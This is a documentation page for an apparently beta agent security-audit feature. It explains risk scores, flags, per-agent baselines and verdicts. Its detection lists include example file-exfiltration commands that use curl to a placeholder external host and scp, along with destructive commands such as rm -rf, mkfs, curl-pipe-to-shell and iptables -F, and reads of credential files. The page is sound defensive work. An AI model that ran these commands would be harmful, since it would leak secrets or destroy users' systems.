Skip to main content
Security Audit is a beta feature. Detection coverage and UI are evolving — feedback is welcome.
Every audit event receives a risk score from 0 to 3. The score determines the event’s risk level — high, medium, or low — and feeds into the per-agent verdict. This page explains what triggers each level, what the risk flags mean, and how agent verdicts are assigned.

Risk levels

High

Score = 3. Confirmed damage or an active attack. Act immediately.

Medium

Score = 2. Confirmed exposure, no confirmed damage yet. Review soon.

Low

Score = 1. Behavioral anomaly or pattern worth noting. Review periodically.

High risk triggers

An event is scored high (3) when any of the following flags are set: exfil_pattern — A shell command explicitly sent local file content to an external URL. The data has already left the machine. Patterns that trigger this flag:
curl -F file=@/path/to/file https://external.example.com
curl --data-binary @/path/to/file https://external.example.com
curl --upload-file /path/to/file https://external.example.com
cat /path/to/file | curl -X POST -d @- https://external.example.com
scp /local/file user@remote:/path
critical_cmd — A destructive or system-altering shell command was executed. Commands in this category:
PatternRisk
rm -rfRecursive forced deletion
`curl/wgetbashorcurl/wgetsh`Remote code execution
chmod +sSets the SUID bit
chmod 777World-writable permissions
dd if=... of=/dev/...Direct disk write
iptables -FFlushes the firewall
mkfsFormats a filesystem
echo ... > /etc/Writes to system configuration
prompt_injection — An injection pattern was detected in agent input. All prompt injection findings are scored high regardless of other context. See Audit Rules for the full pattern list. Confirmed credential exfiltration — A credential was found in agent output and the same session subsequently made an external network call. Claw Lens correlates these two events and flags the finding as a potential exfiltration path.

Medium risk triggers

An event is scored medium (2) when any of the following flags are set: sensitive_data — A credential, API key, token, password, or private key appeared in tool output. The secret was exposed in the agent’s context but has not been confirmed as sent externally. See Credential Inventory for the full list of detected patterns. elevated_cmd — A high-privilege shell command was executed. Commands in this category:
PatternExamples
sudoAny sudo invocation
ssh / scp / rsyncRemote connections and transfers
curl / wgetAny outbound HTTP request in a shell
nc / netcat / ftpRaw network connections
cat .env / cat passwd / cat shadowReading credential files via shell
chown rootChanging ownership to root
new_domain — The agent contacted a domain that does not appear in its baseline history. Domains are tracked per agent; a domain moves from “new” to “known” once it appears in 30 days of baseline data. sensitive_path_medium — The agent accessed a path matching a medium-severity sensitive path rule (e.g., **/id_rsa, **/.env, **/Library/Keychains/**). See Audit Rules for the full path rule table.

Low risk triggers

An event is scored low (1) when any of the following flags are set: sensitive_path — The agent accessed a path matching a low-severity sensitive path rule (e.g., **/.ssh/**, **/*.env, **/*token*) without a credential being found in the output. anomaly_hour — The agent was active at an hour outside its typical active hours as recorded in the baseline. anomaly_volume — The session’s total tool call count exceeded three times the agent’s average tool calls per session. anomaly_path — The agent accessed a filesystem directory it has not accessed in the baseline period.

Risk flags reference

All flags that can appear on an event:
FlagLevelTrigger
exfil_patternHighShell command uploads file content to external URL
critical_cmdHighDestructive shell command (rm -rf, mkfs, etc.)
prompt_injectionHighInjection pattern detected in agent input
sensitive_dataMediumCredential or secret found in tool output
elevated_cmdMediumPrivileged command (sudo, ssh, curl, etc.)
new_domainMediumExternal call to a domain not in baseline
sensitive_path_mediumMediumAccess to a medium-severity sensitive path
sensitive_pathLowAccess to a low-severity sensitive path
anomaly_hourLowActivity outside typical hours
anomaly_volumeLowSession tool call count > 3× baseline average
anomaly_pathLowAccess to a directory not in baseline

Anomaly detection and baselines

Low-risk anomaly flags are relative to each agent’s individual baseline. The baseline is built from the agent’s last 30 days of activity and captures:
  • typical_hours — the 12 most active hours of day
  • avg_tool_calls_per_session — the mean number of tool calls across all sessions
  • typical_paths — the 20 most-accessed filesystem directories
  • known_domains — all external domains the agent has contacted
When an event deviates from the baseline on any of these dimensions, the corresponding anomaly flag is set. Baselines are rebuilt automatically as new sessions come in, so a new domain or new path eventually becomes part of the baseline if the agent accesses it consistently.
Anomaly flags are only set when a baseline exists. A new agent with no history will not trigger anomaly flags until enough sessions have been recorded to build one.

Agent Risk Level

The Agent Security tab assigns each agent one of three verdicts based on its active (non-dismissed) findings:
VerdictMeaning
safeNo active findings
cautionHas medium or low severity active findings
unsafeHas high severity findings, or any active prompt injection finding
Agent Risk Level are driven by the severity of the underlying findings, not raw event counts. Dismissing a finding updates the risk level — if the last high-severity finding on an agent is dismissed, the verdict may drop from unsafe to caution or safe.